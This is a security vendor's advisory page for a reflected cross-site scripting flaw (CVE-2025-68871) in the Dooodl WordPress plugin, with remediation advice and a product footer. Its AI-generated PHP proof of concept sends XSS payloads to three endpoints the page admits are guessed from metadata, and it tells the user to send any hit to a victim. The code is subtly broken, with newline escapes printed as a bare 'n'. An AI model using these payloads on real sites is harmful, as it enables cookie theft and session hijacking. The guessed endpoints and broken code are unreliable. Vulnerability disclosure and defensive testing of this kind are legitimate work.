Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : March 18, 2026

CVE-2025-68871: Dooodl <= 2.3.0 – Reflected Cross-Site Scripting (dooodl)

Plugin dooodl
Severity Medium (CVSS 6.1)
CWE 79
Vulnerable Version 2.3.0
Patched Version
Disclosed January 15, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-68871 (metadata-based):
This vulnerability is a reflected cross-site scripting (XSS) flaw in the Dooodl WordPress plugin, affecting all versions up to and including 2.3.0. The vulnerability allows unauthenticated attackers to inject malicious scripts into web pages viewed by users. The CVSS 3.1 score of 6.1 (Medium) reflects a network-based attack requiring user interaction but leading to scope changes and impacts on confidentiality and integrity.

Atomic Edge research identifies the root cause as insufficient input sanitization and output escaping, consistent with CWE-79. The vulnerability description confirms the plugin fails to properly neutralize user-controlled input before including it in generated web pages. This analysis infers the vulnerable code likely echoes unsanitized GET or POST parameters directly into HTML responses without using WordPress escaping functions like esc_html() or esc_attr(). The exact vulnerable endpoint cannot be confirmed without source code, but the pattern matches common WordPress plugin flaws where administrative or frontend handlers lack proper validation.

Exploitation requires an attacker to craft a malicious URL containing a JavaScript payload in a vulnerable parameter. A victim must click the link or be redirected to the crafted URL. Based on WordPress plugin patterns, the attack likely targets an AJAX handler (wp-admin/admin-ajax.php) with a specific action parameter, or a direct plugin file endpoint. The payload would execute in the victim’s browser context, potentially performing actions as that user. Example: https://target.site/wp-admin/admin-ajax.php?action=dooodl_action&param=alert(document.cookie).

Remediation requires implementing proper input validation and output escaping. The plugin should sanitize all user inputs using WordPress functions like sanitize_text_field() and escape all outputs with esc_html(), esc_attr(), or wp_kses(). WordPress nonce verification should also be added to prevent CSRF attacks. The fix must ensure no unsanitized user data reaches browser responses without proper context-aware escaping.

Successful exploitation allows attackers to execute arbitrary JavaScript in the victim’s browser. This can lead to session hijacking by stealing cookies, performing actions on behalf of the user, defacing website content, or redirecting users to malicious sites. The scope change (S:C in CVSS) indicates the vulnerability can affect components beyond the plugin’s security scope, potentially impacting the entire WordPress admin area if exploited against administrators.

Differential between vulnerable and patched code

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2025-68871 - Dooodl <= 2.3.0 - Reflected Cross-Site Scripting
<?php
/**
 * Proof of Concept for CVE-2025-68871
 * This script demonstrates reflected XSS in Dooodl plugin <= 2.3.0
 * WARNING: For authorized security testing only
 *
 * ASSUMPTIONS (based on metadata analysis):
 * 1. Vulnerability exists in an endpoint accessible without authentication
 * 2. The endpoint echoes unsanitized GET/POST parameters
 * 3. Likely targets: AJAX handler or direct plugin file
 * 4. Plugin slug 'dooodl' maps to action parameter or endpoint path
 */

$target_url = 'http://vulnerable-wordpress-site.com';

// Common WordPress plugin XSS patterns
$endpoints = [
    // AJAX handler (most common WordPress plugin vector)
    '/wp-admin/admin-ajax.php?action=dooodl_action&vulnerable_param=',
    // Direct file access pattern
    '/wp-content/plugins/dooodl/includes/ajax-handler.php?param=',
    // REST API endpoint (less likely for XSS but possible)
    '/wp-json/dooodl/v1/endpoint?data=',
];

// XSS payloads (encoded and plain variants)
$payloads = [
    '<script>alert(document.domain)</script>',
    '<img src=x onerror=alert(1)>',
    '"><script>alert("XSS")</script>',
    'javascript:alert(1)',
];

function test_endpoint($base_url, $endpoint, $payload) {
    $url = $base_url . $endpoint . urlencode($payload);
    
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($ch, CURLOPT_TIMEOUT, 10);
    
    $response = curl_exec($ch);
    $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    curl_close($ch);
    
    // Check if payload appears unsanitized in response
    $decoded_payload = htmlspecialchars_decode($payload, ENT_QUOTES);
    if ($http_code == 200 && strpos($response, $decoded_payload) !== false) {
        return [
            'vulnerable' => true,
            'url' => $url,
            'payload_found' => substr($response, strpos($response, $decoded_payload), 50)
        ];
    }
    
    return ['vulnerable' => false, 'url' => $url];
}

echo "Testing CVE-2025-68871 - Dooodl Reflected XSSn";
echo "Target: $target_urlnn";

$found = false;
foreach ($endpoints as $endpoint) {
    foreach ($payloads as $payload) {
        $result = test_endpoint($target_url, $endpoint, $payload);
        
        if ($result['vulnerable']) {
            echo "[+] POTENTIALLY VULNERABLE ENDPOINT FOUNDn";
            echo "    URL: {$result['url']}n";
            echo "    Payload in response: {$result['payload_found']}nn";
            echo "    EXPLOIT: Send this URL to victim usern";
            echo "    MITIGATION: Update plugin or apply virtual patchn";
            $found = true;
            break 2;
        }
    }
}

if (!$found) {
    echo "[-] No obvious vulnerable endpoints found with tested patternsn";
    echo "    Note: Actual vulnerable parameter/endpoint may differn";
    echo "    based on plugin implementation details.n";
}

?>

Frequently Asked Questions

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations

Trusted by Developers
Blac&kMcDonaldCovenant House TorontoAlzheimer Society CanadaUniversity of TorontoHarvard Medical School